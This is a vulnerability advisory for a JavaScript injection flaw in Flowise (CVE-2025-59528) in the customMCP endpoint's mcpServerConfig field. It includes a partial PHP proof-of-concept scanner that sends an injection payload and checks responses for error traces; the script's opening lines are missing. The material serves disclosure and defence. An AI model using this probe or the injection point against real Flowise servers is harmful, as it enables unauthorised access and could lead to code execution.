============================================================================================================================================= | # Title : Flowise 3.0.6 JS Parsing Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://flowiseai.com/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/211933/ & CVE-2025-59528 [+] Summary : A JavaScript Parsing Injection vulnerability exists in the following Flowise versions: Affected: >= 2.2.7-patch.1 and < 3.0.6 Unauthenticated exploitation possible for versions < 3.0.1 Authentication required for versions >= 3.0.1 The vulnerability resides in the endpoint : /api/v1/node-load-method/customMCP Flowise internally evaluates user input using: Function('return ' + inputString)() This unsafe parsing mechanism allows a remote attacker to inject malformed JavaScript payloads, causing unexpected parsing behavior, syntax exceptions, stack traces, and other abnormal internal execution paths. This report does NOT demonstrate RCE and does NOT execute system commands. It focuses strictly on parsing injection as requested. 2. Vulnerability Description The parameter: inputs.mcpServerConfig is passed directly to a JavaScript interpreter via: Function("return " + input) Because Flowise does not sanitize or validate the input, an attacker can supply a malformed or intentionally broken JavaScript object to force Flowise to: Attempt to interpret the injected JavaScript Generate SyntaxError, ReferenceError, or Unexpected token exceptions Leak internal execution traces Confirm the backend is evaluating untrusted JS strings This behavior proves the system is vulnerable to JavaScript parsing injection. 3. Impact Although this report intentionally excludes RCE, the underlying unsafe parsing mechanism could be chained with additional primitives depending on deployment context. The confirmed impact here is: JavaScript parsing injection Potential denial of service via crafted parsing payloads Internal error leakage Strong indicator of further exploitable unsafe evaluation paths This advisory documents only the safe, non-executing variant. poc "listActions", "inputs" => [ "mcpServerConfig" => $payload ] ]; $options = [ "http" => [ "header" => "Content-Type: application/json\r\n", "method" => "POST", "content" => json_encode($data), "timeout" => 6 ] ]; echo "[*] Sending Parsing Injection Payload...\n"; $context = stream_context_create($options); $response = @file_get_contents($target, false, $context); echo "-----------------------------------\n"; if (!$response) { echo "[!] Target did not respond.\n"; exit; } // Detection patterns if (preg_match('/SyntaxError|ReferenceError|Unexpected|stack/i', $response)) { echo "[+] Vulnerable: JS Parsing Injection confirmed.\n"; echo "[+] Evidence: Backend attempted to interpret injected JS.\n"; } else { echo "[-] Not vulnerable or patched.\n"; } echo "-----------------------------------\n"; echo "[*] Raw Response:\n$response\n"; Save as : poc.php run : php poc.php Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================